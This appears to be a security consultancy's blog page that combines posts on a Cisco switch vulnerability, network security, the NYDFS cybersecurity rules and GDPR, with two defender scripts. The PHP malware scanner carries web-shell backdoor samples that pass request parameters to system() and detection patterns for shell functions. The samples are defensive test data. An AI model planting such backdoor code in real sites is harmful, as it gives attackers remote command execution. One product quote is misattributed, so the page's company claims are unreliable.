CYBER SECURITY CONSULTING SERVICE AWARDS AND RECOGNITIONS
CyberSecOp's comprehensive managed security services, cyber security consulting, professional services, and data protection technology are recognized as industry-leading threat detection and response solutions by major analyst firms, key media outlets, and others.
Cisco Switches vulnerable to remote hacking
Security researchers at Embedi have disclosed a critical vulnerability in Cisco IOS Software and Cisco IOS XE Software that could allow an unauthenticated, remote attacker to execute arbitrary code, take full control over the vulnerable network equipment and intercept traffic.
The stack-based buffer overflow vulnerability (CVE-2018-0171) stems from improper validation of packet data in Smart Install Client, a plug-and-play configuration and image-management feature that helps administrators deploy (client) network switches easily.
Embedi has published technical details and Proof-of-Concept (PoC) code after Cisco today released patch updates to address this remote code execution vulnerability, which has been given a base Common Vulnerability Scoring System (CVSS) score of 9.8 (critical).
Researchers found a total of 8.5 million devices with the vulnerable port open on the Internet, leaving approximately 250,000 unpatched devices open to hackers.
To exploit this vulnerability, an attacker needs to send a crafted Smart Install message to an affected device on TCP port 4786, which is opened by default.
"To be more precise, the buffer overflow takes place in the function smi_ibc_handle_ibd_init_discovery_msg" and "because the size of the data copied to a fixed-size buffer is not checked, the size and data are taken directly from the network packet and are controlled by an attacker," Cisco explains in its advisory.
The vulnerability can also result in a denial-of-service condition (watchdog crash) by triggering an indefinite loop on the affected devices.
Researchers demonstrated the vulnerability at a conference in Hong Kong after reporting it to Cisco in May 2017.
Affected Hardware and Software:
The vulnerability was tested on Catalyst 4500 Supervisor Engines, Cisco Catalyst 3850 Series Switches, and Cisco Catalyst 2960 Series Switches, but all devices that fall into the Smart Install Client type are potentially vulnerable, including:
- Catalyst 4500 Supervisor Engines
- Catalyst 3850 Series
- Catalyst 3750 Series
- Catalyst 3650 Series
- Catalyst 3560 Series
- Catalyst 2960 Series
- Catalyst 2975 Series
- IE 2000
- IE 3000
- IE 3010
- IE 4000
- IE 4010
- IE 5000
- SM-ES2 SKUs
- SM-ES3 SKUs
- NME-16ES-1G-P
- SM-X-ES3 SKUs
Cisco fixed the vulnerability in all of its affected products on 28th March 2018, and Embedi published a blog post detailing the vulnerability on 29th March. Administrators are strongly advised to install the free software updates that address the issue as soon as possible.
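The article gives a defender two concrete facts to act on: the Smart Install client listens on TCP port 4786 by default, and the affected software needs to be patched. The following Python script is an added example written for this page (it is not Embedi's PoC or Cisco's code) that turns those facts into two routine checks: it parses the output of the Cisco IOS command `show vstack config` to tell whether the Smart Install client is still enabled on a switch, and it scans firewall or flow log lines for TCP connections to port 4786 that do not originate from an approved management network. The `show vstack config` output, the log format, the management subnet and all IP addresses are constructed for the example; the command itself and the `no vstack` workaround are Cisco's documented ones.

```python
"""Defender-side triage for Smart Install exposure (CVE-2018-0171).

Two checks (added example, not the page's or Cisco's own code):
  1. parse_vstack_status(): reads `show vstack config` output captured from a
     switch and reports whether the Smart Install client is still enabled.
  2. flag_smart_install_connections(): scans firewall/flow log lines for TCP
     connections to port 4786 and flags any whose source is outside the
     approved management networks.

Remediation for a switch where the client is enabled: upgrade to a fixed
release and, until then, disable the client with `no vstack` (Cisco's
documented workaround).
"""
import ipaddress
import re

SMART_INSTALL_PORT = 4786  # TCP port the Smart Install client opens by default

# Constructed sample output of `show vstack config` on two hypothetical switches.
VSTACK_ENABLED = """\
Role: Client (SmartInstall enabled)
Vstack Director IP address: 0.0.0.0
"""
VSTACK_DISABLED = """\
Role: Client (SmartInstall disabled)
Vstack Director IP address: 0.0.0.0
"""


def parse_vstack_status(output: str) -> bool:
    """Return True when the captured output shows the Smart Install client enabled."""
    match = re.search(r"Role:\s*\w+\s*\(SmartInstall\s+(enabled|disabled)\)", output)
    if not match:
        raise ValueError("no Smart Install role line found in output")
    return match.group(1) == "enabled"


# Constructed firewall log lines (syslog-like key=value fields). Only the
# second and fifth lines are TCP/4786 connections from outside management.
SAMPLE_LOGS = [
    "2018-03-29T10:00:01Z fw1 proto=TCP src=10.10.5.20:51234 dst=10.10.1.2:4786 action=allow",
    "2018-03-29T10:00:05Z fw1 proto=TCP src=198.51.100.7:40000 dst=10.10.1.2:4786 action=allow",
    "2018-03-29T10:00:09Z fw1 proto=TCP src=198.51.100.7:40001 dst=10.10.1.3:22 action=allow",
    "2018-03-29T10:00:12Z fw1 proto=UDP src=10.10.7.9:4786 dst=10.10.1.2:4786 action=allow",
    "2018-03-29T10:00:15Z fw1 proto=TCP src=203.0.113.44:5555 dst=10.10.1.4:4786 action=deny",
]

LOG_RE = re.compile(
    r"proto=(?P<proto>\w+)\s+src=(?P<src>[\d.]+):(?P<sport>\d+)\s+"
    r"dst=(?P<dst>[\d.]+):(?P<dport>\d+)\s+action=(?P<action>\w+)"
)


def flag_smart_install_connections(lines, mgmt_networks):
    """Return TCP/4786 connections whose source is not in an approved management network.

    Denied connections are reported as well: a blocked attempt from outside is
    still evidence that the port is being probed.
    """
    nets = [ipaddress.ip_network(n) for n in mgmt_networks]
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m or m["proto"].upper() != "TCP" or int(m["dport"]) != SMART_INSTALL_PORT:
            continue  # not a TCP connection to the Smart Install port
        src = ipaddress.ip_address(m["src"])
        if any(src in net for net in nets):
            continue  # expected management traffic
        findings.append({"src": str(src), "dst": m["dst"], "action": m["action"]})
    return findings


if __name__ == "__main__":
    for name, output in (("switch-a", VSTACK_ENABLED), ("switch-b", VSTACK_DISABLED)):
        state = "ENABLED - patch and apply 'no vstack'" if parse_vstack_status(output) else "disabled"
        print(f"{name}: Smart Install {state}")
    for hit in flag_smart_install_connections(SAMPLE_LOGS, ["10.10.5.0/24"]):
        print(f"unexpected TCP/{SMART_INSTALL_PORT} from {hit['src']} to {hit['dst']} ({hit['action']})")
```

Run the script as-is to see both switch states and the two flagged sources; in practice, feed it the real `show vstack config` captures and your own log export, and put the management subnets you actually use in place of the constructed `10.10.5.0/24`.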
Security Specialist
Security Consulting
Many people who sell security products call themselves security consultants and they are part of the security field, but there are also security consultants who don't sell products. These individuals are paid on an hourly or project basis to help clients, usually corporations, protect their personnel and property. Property security embraces both real estate and tangible equipment as well as other assets like client lists and proprietary technology. Employee and customer theft, as well as piracy, are possible focuses for a security consulting practice. Technical security consultants are knowledgeable about products such as electronic security systems, including their development and how to apply them. The work may involve system design as well as drafting plans and documents.
Computer Security
While virtually all security consultants employ computer technology in their work, the computer security niche specifically involves protecting computer systems and networks themselves against unauthorized use and abuse. A computer security consultant often specializes in particular operating systems such as UNIX, Linux or Windows.
Site Consulting
Whether it's new construction or remodeling, virtually every building and office (be it a high-tech industrial complex, retail franchise, distribution center, self-storage facility, housing development, hotel, resort, casino, parking lot or law firm) is interested in some aspect of site security. Security site consultants evaluate the physical design of such buildings and spaces, determine what security problems a site poses and recommend countermeasures, such as guards, electronic security with cameras and electric lights, or a combination of methods and policies.
System Design
Security system designers develop specifications and provide architectural or engineering support in the design phase of a security consulting project. System designers may also develop new electronic security tools to be used at a particular location.
Forensic Consulting
Forensic security consultants serve as expert witnesses in trials in which security breaches are at issue, such as with fires, thefts, break-ins, and so on. Forensic consultants may specialize in any of the above fields.
As a security practitioner, you can also develop niches for your work based on the type of clients you work with, such as museums or historical sites, shipyards and airports. Unlike professional investigators, security consultants don't have to be licensed by state agencies. However, there are professional associations you can join and certification programs you can complete, which may help foster a sense of trust with your clients. One of the larger associations, which provides certification.
Specializing is key to marketing a security specialty business because it will help you more easily identify and market to clients who need such services, such as architects and contractors or members of a particular industry, such as software developers or law firms. You'll be soliciting work and attracting clients by making presentations and speeches or networking in organizations where you can showcase your expertise. In addition to your knowledge of security, you must be prepared to develop your speaking skills in order to attract new business.
What Is Network Security?
Network security is an organization’s strategy and provisions for ensuring the security of its assets and all network traffic. Network security is manifested in an implementation of security hardware and software. For the purposes of this discussion, the following approach is adopted in an effort to view network security in its entirety.
Policy
The IT Security Policy is the principal document for network security. Its goal is to outline rules for ensuring the security of organizational assets. Employees today often utilize several tools and applications to conduct business productively. Policy driven by the organization's culture supports these routines and focuses on safely enabling these tools for employees. Enforcement and auditing procedures for any regulatory compliance to which an organization is subject must be mapped out in the policies and controls as well.
Types of network security
Access control
Not every user should have access to your network. To keep out potential attackers, you need to recognize each user and each device. Then you can enforce your security policies. You can block noncompliant endpoint devices or give them only limited access. This process is network access control (NAC).
Antivirus and antimalware software
"Malware," short for "malicious software," includes viruses, worms, Trojans, ransomware, and spyware. Sometimes malware will infect a network but lie dormant for days or even weeks. The best antimalware programs not only scan for malware upon entry, but also continuously track files afterward to find anomalies, remove malware, and fix damage.
Application security
Any software you use to run your business needs to be protected, whether your IT staff builds it or whether you buy it. Unfortunately, any application may contain holes, or vulnerabilities, that attackers can use to infiltrate your network. Application security encompasses the hardware, software, and processes you use to close those holes.
Behavioral analytics
To detect abnormal network behavior, you must know what normal behavior looks like. Behavioral analytics tools automatically discern activities that deviate from the norm. Your security team can then better identify indicators of compromise that pose a potential problem and quickly remediate threats.
Data loss prevention
Organizations must make sure that their staff does not send sensitive information outside the network. Data loss prevention, or DLP, technologies can stop people from uploading, forwarding, or even printing critical information in an unsafe manner.
Email security
Email gateways are the number one threat vector for a security breach. Attackers use personal information and social engineering tactics to build sophisticated phishing campaigns to deceive recipients and send them to sites serving up malware. An email security application blocks incoming attacks and controls outbound messages to prevent the loss of sensitive data.
Firewalls
Firewalls put up a barrier between your trusted internal network and untrusted outside networks, such as the Internet. They use a set of defined rules to allow or block traffic. A firewall can be hardware, software, or both. Cisco offers unified threat management (UTM) devices and threat-focused next-generation firewalls.
Intrusion prevention systems
An intrusion prevention system (IPS) scans network traffic to actively block attacks. Next-Generation IPS (NGIPS) appliances do this by correlating huge amounts of global threat intelligence to not only block malicious activity but also track the progression of suspect files and malware across the network to prevent the spread of outbreaks and reinfection.
Mobile device security
Cybercriminals are increasingly targeting mobile devices and apps. Within the next 3 years, 90 percent of IT organizations may support corporate applications on personal mobile devices. Of course, you need to control which devices can access your network. You will also need to configure their connections to keep network traffic private.
Network Segmentation
Software-defined segmentation puts network traffic into different classifications and makes enforcing security policies easier. Ideally, the classifications are based on endpoint identity, not mere IP addresses. You can assign access rights based on role, location, and more so that the right level of access is given to the right people and suspicious devices are contained and remediated.
Security information and event management
SIEM products pull together the information that your security staff needs to identify and respond to threats. These products come in various forms, including physical and virtual appliances and server software.
VPN
A virtual private network encrypts the connection from an endpoint to a network, often over the Internet. Typically, a remote-access VPN uses IPsec or Secure Sockets Layer to authenticate the communication between device and network.
Web security
A web security solution will control your staff’s web use, block web-based threats, and deny access to malicious websites. It will protect your web gateway on site or in the cloud. "Web security" also refers to the steps you take to protect your own website.
Wireless security
Wireless networks are not as secure as wired ones. Without stringent security measures, installing a wireless LAN can be like putting Ethernet ports everywhere, including the parking lot. To prevent an exploit from taking hold, you need products specifically designed to protect a wireless network.
Cyber Security, New York Fights Back to Prevent Financial System Take Down
As hackers become more sophisticated and cyber attacks more routine, New York is on notice.
With a lack of leadership from the federal government, New York is one of the first states to implement new cyber regulations.
The state is quietly working to prevent a major cyber attack that could bring down Wall Street's financial system.
But even with the strictest cybersecurity regulations in the country, experts warn New York's efforts may still not be enough.
NEW YORK — Five months before the 9/11 attacks, US Secretary of Defense Donald Rumsfeld sent a memo to one of his advisers with an ominous message.
"Cyberwar," read the subject line.
"Please take a look at this article," Rumsfeld wrote, "and tell me what you think I ought to do about it. Thanks."
Attached was a 38-page paper, published seven months prior, analyzing the consequences of society's increasing dependence on the internet.
It was April 30, 2001. Optimistic investors and frenzied tech entrepreneurs were still on a high from the dot-com boom. The World Wide Web was spreading fast.
Once America's enemies got around to fully embracing the internet, the report predicted, it would be weaponized and turned against the homeland.
The internet would be to modern warfare what the airplane was to strategic bombers during World War I.
The paper's three authors — two PhD graduates and the founder of a cyber defense research center — imagined the damage a hostile foreign power could inflict on the US. They warned of enemies infecting computers with malicious code, and launching mass denial of service attacks that could bring down networks critical to the functioning of the American economy.
"[We] are concerned that US leadership, and other decision makers about Internet use, do not fully appreciate the potential consequences of the current situation," the report said. "We have built a network which has no concept whatsoever of national boundaries; in a war, every Internet site is directly on the front line. If we do not change course soon, we will pay a very high price for our lack of foresight."
The US government had a problem on its hands and it seemed a long ways from figuring out how to handle it.
More than 17 years later, that problem seems to have only gotten worse.
Follow the money
Willie Sutton, the notorious Brooklynite who spent his life in and out of prison, once told a reporter he robbed banks because that's where the money is. Computer hackers aren't so different.
In 2016, hackers attacked companies in the financial services sector more than companies in any other industry, according to IBM. Over 200 million financial records were breached that year, a 937% increase from 2015. And that's not including the incidents that were never made public.
As hackers become more sophisticated and cyber attacks more routine, New York is on notice. Home to the most valuable stock exchange on Earth, New York City is the financial capital of the world. When the market moves here, it moves everywhere.
So it was no surprise when in September 2016, Gov. Andrew Cuomo announced that the New York State Department of Financial Services (NYDFS) was gearing up to implement sweeping, first-of-their-kind cybersecurity regulations to protect the state's financial services industry — an unprecedented move no other state or federal agency had taken anywhere in the US.
Cybersecurity in New York's financial industry was previously governed by voluntary frameworks and suggested best practices. But the NYDFS introduced, for the first time, regulations that would be mandatory, including charging firms fines if they didn't comply.
Maria Vullo, the state's top financial regulator, told Business Insider that her No. 1 job is to protect New Yorkers.
"They're buying insurance. They're banking. They're engaging in financial transactions. And in each of those activities, they're providing their social security information, banking information, etc.," she said. "The companies that are obtaining that personal information from New Yorkers must protect it as much as possible because a breach of that information is of great consequence to the average New Yorker."
On March 1, the regulations turn a year old, although some of the rules are not yet in effect and will phase in over time.
The NYDFS oversees close to 10,000 state-chartered banks, credit unions, insurance companies, mortgage loan servicers, and other financial institutions, in addition to 300,000 insurance licensees.
The combined assets of those organizations exceed $6 trillion, according to the NYDFS — and they're all in constant danger of being hacked.
Banks are vulnerable
In the summer of 2014, an American, two Israelis, and two co-conspirators breached a network server of JPMorgan Chase, the largest US bank.
They got hold of roughly 83 million customers' personal information, including names, addresses, phone numbers, and email addresses.
The hackers didn't steal any money from personal bank accounts, but that wasn't the point.
They wanted access to a massive trove of emails that they could use for a larger, separate money scam. In just three years, that operation netted the hackers more than $100 million.
The JPMorgan hack wasn't the end game. It was a piece of the puzzle.
The attack began with the simple theft of a JPMorgan employee's login credentials, which were located on a server that required just one password.
Most servers with sensitive information like a person's banking data require what's called multi-factor, or two-factor authentication.
But JPMorgan's security team had lapsed and failed to upgrade the server to include the dual password scheme, The New York Times reported at the time.
The attack, the breach, and the reputational damage that followed could have been avoided with tighter security. Instead, the hack went down as one of the largest thefts of customer data in US history.
"Banks are especially vulnerable," Matthew Waxman, a professor at Columbia Law School and co-chair of the Cybersecurity Center at the Columbia Data Science Institute, told Business Insider. "Disruption to the information systems on which banks rely could have shockwaves throughout the financial system, undermining public confidence in banking or knocking off line the ability to engage in commercial transactions."
That's the kind of catastrophic damage that worried the authors cited in Defense Secretary Rumsfeld's 2001 memo.
They weren't only concerned about stolen email addresses and social security numbers. They were worried about the fallout from such activity.
Banking works because consumers trust the system. But what if people lose trust?
Waiting until a catastrophe
News of impending cybersecurity regulations in New York in the fall of 2016 was both welcomed and shunned.
Some companies saw it as a chance to improve their own security standards while others complained of government overreach. Some were relieved to find they wouldn't have to make any adjustments to the way they operated. Others were overwhelmed by the heavy lifting they would have to do to comply.
How a company views the regulations depends in large part on its size. Bigger institutions with more cybersecurity professionals and more resources at their disposal tend to already have in place much of what the regulations require. Many smaller companies, which tend to be under-staffed and under-resourced, have a lot more work to do to catch up.
The only additional thing Berkshire Bank has to do is sign off on its annual compliance form, which it sends to NYDFS to prove that it's doing everything it's supposed to be doing.
"We actually have to do nothing [new] from a compliance standpoint," the company's chief risk officer Gregory Lindenmuth told Business Insider.
While several cybersecurity consultants told Business Insider they acknowledge the NYDFS rules as a positive step in the right direction, they also point to a new law in Europe as a leading example of the role government has to play in protecting individuals' privacy rights and ensuring that companies secure consumers' personal information.
In 2016, the European parliament passed a law called the General Data Protection Regulation (GDPR) — landmark legislation that imposes millions of euros in fines on companies that do not adequately protect their customers' data.
Whereas the NYDFS regulations cover just one industry in one US state, the GDPR affects companies in all industries across all 28 member states of the European Union. Companies that do not report a data breach or fail to comply with the law more generally could be fined up to €20 million or 4% of their global revenue.
Matthew Waxman, the Columbia professor, says it's not surprising that the implementation of such a law remains far-fetched in the US.
"It's sometimes very difficult to get the government to take action against certain threats until a catastrophe takes place," Waxman said. "But that could change very suddenly if the banking system were knocked offline or another very major disruption to everyday life affected the lives and security of citizens on a massive scale."
But are the deterrents strong enough?
Data protection advocates calling for stricter cybersecurity regulations in the US are generally happy about the NYDFS rules.
For the first time, a state government is taking seriously the protection of consumer data, they say. It's giving companies in the financial sector an ultimatum: protect New Yorkers or face punishment.
"My big criticism of the regulations is there's no clear consequence for non-compliance," Thomas Boyden, the president of GRA Quantum and a cybersecurity expert who helps companies defend against cyber attacks, told Business Insider. "If companies don't feel like there's going to be any consequence for any action on their part, companies aren't going to take [the regulations] seriously."
In fact, for many companies, Boyden thinks "that's the default position."
Vullo, the head of the NYDFS, said she has the ability to fine companies that are not complying and is willing to exercise that authority, although how much that cost may be would depend case-by-case.
"I don't want this to be a punitive atmosphere, but obviously if institutions are not taking this seriously, then there will be consequences," she said. "But it's not the objective."
If anything, the objective is to make it clear that cyber threats are real and that New Yorkers and the companies that maintain their personal information are facing higher risks of attack.
Cybersecurity affects everyone, and Vullo said she hopes the regulations will help companies prioritize it.
"Everyone is part of our cybersecurity team," Theresa Pratt, the chief information security officer at Market Street Trust, a private trust company in New York, told Business Insider. "It doesn't matter what myself or my colleagues do from a technical perspective. If I have one user who clicks a bad link or answers a phisher's question over the phone, it's all for naught."
New York leading the way
The new rules have far-reaching implications beyond New York. A business in the state that has a parent company based in Germany, for example, still has to comply with the regulations.
This leaves some organizations in the precarious position of having to either restructure company-wide cybersecurity practices or build an entirely new and unique security apparatus that is specific to its New York offices.
"I do think that because of the scope of some of these regulations, they're kind of blurring the lines between countries and continents. I think we're going to see more and more of this," GreyCastle Security CEO Reg Harnish told Business Insider. The New York-based consulting firm is helping companies comply with the new regulations.
In the absence of leadership from the federal government on certain issues related to cybersecurity and data protection, states like New York are beginning to fill the void. Several cybersecurity experts told Business Insider that the NYDFS regulations could become a model for other industries or even policies at the national level.
Last year, at least 42 states introduced more than 240 bills or resolutions related to various cybersecurity issues, according to the National Conference of State Legislatures. And since the NYDFS rules took effect, financial regulators in Colorado and Vermont have followed New York's lead with cybersecurity regulations of their own.
Indeed, cyber experts have come a long way in better understanding the threats we face since Rumsfeld's dire cyberwar memo in 2001. But 17 years on, the former secretary of defense's concerns still seem as relevant as ever.
Perhaps the memo was a prescient warning — a warning that fell on deaf ears, but is not too late to address.
GDPR European Union General Data Protection Regulation
The European Union General Data Protection Regulation will go into effect on May 25, and healthcare organizations who treat patients from any of the 28 EU nations will need to familiarize themselves with the law to ensure compliance.
GDPR requires companies to gain affirmative consent for any data collected from people who reside in the EU. And organizations that violate the law could face fines up to four percent of their global annual revenue or 20 million euros -- whichever fine is higher.
While U.S. organizations must remain HIPAA-compliant, GDPR rules could be a game-changer for those who care for EU patients. Providers will need to consider data flows, cross-border data transfer, privacy and security monitoring, to ensure their policies are compliant with the law.
Tougher than HIPAA
GDPR is much more stringent than HIPAA, as it broadens the definition of personal data and covers any information associated with an “identified or identifiable natural person,” including computer IP addresses, photos, credit card data and the like.
The law also mandates organizations process data requests from EU patients much more quickly than with U.S. standards. And providers will also need clear permission to even use EU resident information.
Because of HIPAA, GDPR is nothing new for U.S. healthcare organizations, explained Kristen Johns, partner at Waller, a national healthcare law firm.
“But it will be a real shock for people who aren’t aware of the kind of data they hold and what they share with other vendors,” said Johns. “But for healthcare, it shouldn’t be a shock or learning curve.”
To Johns, there’s a fundamental difference between GDPR and HIPAA, as the EU law is based on personal rights, while HIPAA is focused more on the data itself and who can share it and what can be done with it.
Right to erasure and consent
One of the biggest challenges for U.S. providers will likely be the GDPR "right to be forgotten", sometimes known as the right to erasure. One of the cornerstones of the law is to strengthen individual rights, meaning organizations must honor all patient requests to erase personal data.
It also places limits on how long data can be stored, covering all data not considered valuable to scientific research under the GDPR definition. Organizations must implement technology capable of totally and completely erasing personal data upon request.
For the U.S., where it’s common to store patient data indefinitely, this will be a major change.
Notice of consent is the other area U.S. providers must fully understand, explained Johns. Providers should draft consent forms that outline what’s collected and make sure that they give a clear place for patients to opt in or out of data sharing or collection.
“Securing disclosure: It boils down to consent, something beyond what exists now in most cases,” Johns said. “You have to show that you have that chance to opt in and out easily. And consent has to be in clear, plain language. Currently, not all these healthcare consents are.”
Roughly translated, GDPR mandates the elimination of fine print, often overlooked by patients, which can contain loopholes in privacy policies. The idea is that organizations will need to simplify consent language so that it’s easy for patients to understand.
Tighter security
GDPR also cracks down on security requirements to ensure patient data is protected. This includes implementing pseudonymization and redundancy, along with routine pen testing and intrusion detection measures. Further, much like with HIPAA, organizations will need a continuous process to evaluate their security measures.
But one GDPR mandate that some healthcare organizations still haven't gotten right is the need for encryption. Providers must lock down all patient data, if they haven't already.
And one final security measure that is vastly different from HIPAA is that organizations will only have 72 hours to inform EU patients of a breach. HIPAA gives providers 60 days from the time of discovery.
“In reality, GDPR article is about data protection by design and by default,” said Johns. “It gives all identities that could be a data processor … a chance to look at their IT infrastructure and see where they can improve to comply with GDPR.”
There are plenty of lists online to determine how entities can be compliant with the data structure of each entity, and how it applies to internal audits, explained Johns. But for healthcare, “the big thing is the internal audit: looking to make sure they have the ability to access information quickly in a compliant way with GDPR and HIPAA.”
Enterprises understand cyber risks
Hackers and cyber criminals often seek to exploit human errors like misconfigurations, poor security practices and the use of shadow IT.
In order to help businesses assess the risk, CyberSecOp is launching an automated advanced persistent threat (APT) simulation platform, LocPar, to continuously expose all attack vectors, above and below the surface.
LocPar uses advanced attack techniques to expose the most critical blind spots. In the process, it provides data-driven remediation that focuses on an organization's most critical assets, reduces its IT risk and enables it to optimize its cyber resources.
"The best way to prevent a cyber attack is to identify in advance the attack vectors hackers will use to compromise an organization's critical assets," says CEO and co-founder of XM Cyber Noam Erez. "Even when an organization has deployed and configured modern security controls, applied patches and refined policies, it should still ask 'Are my crown jewels really secure?' as there is a plethora of ways hackers can still infiltrate the system and compromise critical assets. This is why we founded CyberSecOp: to equip enterprises with a continuous 360° view of which critical assets are at risk, what security issues they should focus on, and how best to harness their resources to resolve them."
Features of LocPar include full mapping of all attack paths at any given time, automatic adaptation to the context of the organization, using misconfigurations, user activity, credentials and security vulnerabilities in the network.
Comprehensive and up-to-date attack scenarios use the latest hackers' techniques and methods, giving the ability to detect and remediate IT-related risks in real-time. Reports are produced based on how critical the attack vector is.
Secure Your Website from Cyber Attacks
The average website was attacked 44 times a day during the last quarter of 2017, according to new research from security specialist SiteLock.
The company analyzed six million sites to identify trends in the behavior and tactics of attackers. Though the number of attacks represents a 25 percent decrease over the previous quarter, it still means a site could be attacked 16,000 times a year.
"A decrease in attacks does not mean that websites are safer. In fact, it may even be the opposite," says Neill Feather, president of SiteLock on the company's blog. "Hackers are constantly trying new avenues and even leveraging older tactics that continue to be successful. As our research shows, cybercriminals are now able to successfully breach a site with fewer, more targeted attacks. Now more than ever, businesses need to evaluate their current security posture and ensure they have both the right technology and a response plan in place should a hack occur."
Among other findings are that around one percent of sites sampled are infected with malware each week. Yet only 19 percent of infected sites are blacklisted by search engines. WordPress sites using plugins are twice as likely to be infected as sites that don’t employ a content management system. In addition, 46 percent of infected WordPress sites have the latest core updates. The average number of infected files per site increased by 0.8 percent to 309.
The malware being used is increasingly complex too. 51 percent of the malware found was categorized as encoded malware, meaning it was randomly generated or otherwise difficult to decode. Such files are often parts of groups of files called 'attack kits'. Backdoors made up 12 percent of malicious files; once in place, they let attackers upload still more files to infected sites.
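Much of the encoded malware and backdoor activity behind the SiteLock figures can be triaged with simple content heuristics before a full malware scan. The Python below is an added example, not SiteLock's scanner: it flags eval() wrapped around a decoder, the preg_replace /e modifier, request parameters passed straight to shell functions, hex-escaped function names, and long high-entropy string literals, and runs over three constructed PHP samples (one clean, one encoded-dropper stand-in, one web shell). The signature names, entropy threshold and samples are assumptions made for the example.

```python
"""Heuristic scanner for encoded PHP malware and web-shell backdoors.

Added example, not SiteLock's scanner. The indicators below are common
traits of obfuscated web malware: eval() fed by a decoder such as
base64_decode or gzinflate, the preg_replace /e modifier (executes the
replacement as code), request parameters passed straight to a shell
function, hex-escaped function names, and long high-entropy string
literals. Samples are constructed inline and are never executed.
"""
import base64
import hashlib
import math
import re
from collections import Counter

# Signature set is deliberately small and readable; real scanners use far
# larger lists plus AST analysis. Names and patterns are assumptions.
SIGNATURES = {
    "encoded-eval": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|rawurldecode)\s*\(", re.I),
    "preg-replace-eval": re.compile(
        r"preg_replace\s*\(\s*['\"]/.*?/[a-z]*e[a-z]*['\"]", re.I),
    "request-to-shell": re.compile(
        r"\b(?:system|exec|passthru|shell_exec|popen|proc_open|assert)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    "hex-escaped-function": re.compile(r"\\x[0-9a-f]{2}(?:\\x[0-9a-f]{2}){3,}", re.I),
}
# Any base64-alphabet literal of 200+ characters deserves a closer look.
LONG_STRING = re.compile(r"['\"]([A-Za-z0-9+/=]{200,})['\"]")


def shannon_entropy(s):
    """Bits per character: roughly 4.3 for English prose, 5.5-6 for base64
    of compressed or random data (6 is the maximum for a 64-symbol alphabet)."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan(source):
    """Return the sorted list of indicator names that fire on one PHP file."""
    hits = {name for name, rx in SIGNATURES.items() if rx.search(source)}
    for blob in LONG_STRING.findall(source):
        if shannon_entropy(blob) > 5.0:  # threshold is an assumption
            hits.add("high-entropy-blob")
            break
    return sorted(hits)


def scan_site(files):
    """files: {path: source}. Returns {path: hits} for flagged files only."""
    result = {}
    for path, src in files.items():
        hits = scan(src)
        if hits:
            result[path] = hits
    return result


# Constructed samples (not real malware) -------------------------------------
CLEAN = """<?php
function greet($name) { return "Hello, " . htmlspecialchars($name); }
echo greet($_GET['name'] ?? 'world');
"""

# Stand-in for an encoded payload: hash output, not real malware or valid gzip.
_BLOB = base64.b64encode(
    b"".join(hashlib.sha256(bytes([i])).digest() for i in range(8))).decode()
ENCODED = "<?php eval(gzinflate(base64_decode('" + _BLOB + "'))); ?>"

BACKDOOR = r"""<?php
if (isset($_POST['cmd'])) { echo "<pre>"; system($_POST['cmd']); echo "</pre>"; }
$f = "\x73\x79\x73\x74\x65\x6d"; $f($_REQUEST['c']);   // "system" spelled in hex
preg_replace("/.*/e", $_POST['x'], "");
"""

if __name__ == "__main__":
    site = {"index.php": CLEAN,
            "wp-content/uploads/cache.php": ENCODED,
            "wp-includes/class-wp-helper.php": BACKDOOR}
    for path, hits in scan_site(site).items():
        print(f"{path}: {', '.join(hits)}")
```

Treat hits as triage, not verdicts: legitimate plugins sometimes embed base64 images or hex escapes, so each flagged file needs a manual look. Because the research found that nearly half of infected WordPress sites were running current core code, the directories worth sweeping first are plugins, themes and uploads rather than core itself.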
NYDFS Cybersecurity Regulation Compliance: Retaining a CISO or CSO
With cyber-attacks on the rise and comprehensive federal cybersecurity policy lacking for the financial services industry, New York is leading the nation with strong cybersecurity regulation. Among other protective measures, it sets minimum standards for a cybersecurity program based on the entity's risk assessment, personnel, training, and the controls in place to protect data and information systems, the Superintendent said in a press release issued by DFS. CyberSecOp helps financial organizations comply with the NYDFS mandates.
With the New York Department of Financial Services’ (NY DFS) new terms poised to come into effect next month, banks and financial services companies operating in the state must start preparing for the change.
One of the most discussed issues in the controversial proposal is the requirement to appoint a CISO (chief information security officer). The move was met by heavy criticism at a hearing in December last year, leading to a massive backtrack from the DFS in a revised proposal.
Requirements of the CISO
The latest proposal removes any explicit requirement to hire a CISO, which is good news for many smaller or rural financial institutions that don’t currently have one in place. What this means, practically, is that the position is no longer necessarily exclusive. Banks can choose to designate someone to complete the tasks of a CISO while also performing other duties. Alongside this, the proposal does not state that the specific title of ‘CISO’ is required.
So what will the CISO (or CISO by any other name) be asked to do? The role now covers a broader set of responsibilities but in a less detailed manner. The designated person will have to provide an annual report to the board of directors (previously proposed as a biannual report) on the “cybersecurity program and material cybersecurity risks”, according to the proposal. It is now specified that the report must be “in writing” but it no longer needs to be provided to the NY DFS upon request.
The required content of the report will now also be less extensive. The CISO must identify and report only on material cyber risks rather than all cyber risks. This will involve “consider[ing]” those issues “to the extent applicable.” Additionally, the CISO will be able to tailor their focus to the issues appropriate to their organization.
Finding the right candidate
The NY DFS’ revision allowing the CISO to be an employee of the covered entity (i.e. an internal hire), or an affiliate or third-party service provider offers crucial flexibility for smaller financial institutions.
Companies with only a handful of employees – the most vocal in their frustration at the DFS’ initial plans – may look to shuffle their existing staff.
When doing that – or in making a new hire – there are certain things organizations need to look for. The CISO role is not just a tech-specific position, notes John Linkous, RSA Conference's technology advisor; the CISO must now be "a trusted advisor to the business as a whole". He adds:
“One of the most critical capabilities is simply the ability to understand the business much more intimately than his or her predecessors. Business drives the need for technology, and so security must be focused on how data is used within those business functions, across the end-to-end spectrum. Without a solid understanding of what the organization does, and how it makes money, an information security officer is going to have a fundamental disconnect with what’s needed to protect the enterprise.”
Third-party service providers or affiliates
Given the responsibility placed on the CISO, outsourcing the role to a third party can be an appealing proposition.
Going down this route presents its own set of issues, though. As TechTarget reported, third parties are "almost always" involved when it comes to cyber breaches, whether through a lack of accountability or a lack of oversight. While service-level agreements (SLAs) are always advised, the DFS has taken steps to ensure the right measures are in place. In response to the fear that financial services firms would not always have sufficient power to force third parties to accept their preferred provisions, the NY DFS now dictates that all third-party services must be performed under contractual provisions rather than by way of "relevant guidelines for due diligence."
Source: www.itgovernanceusa.com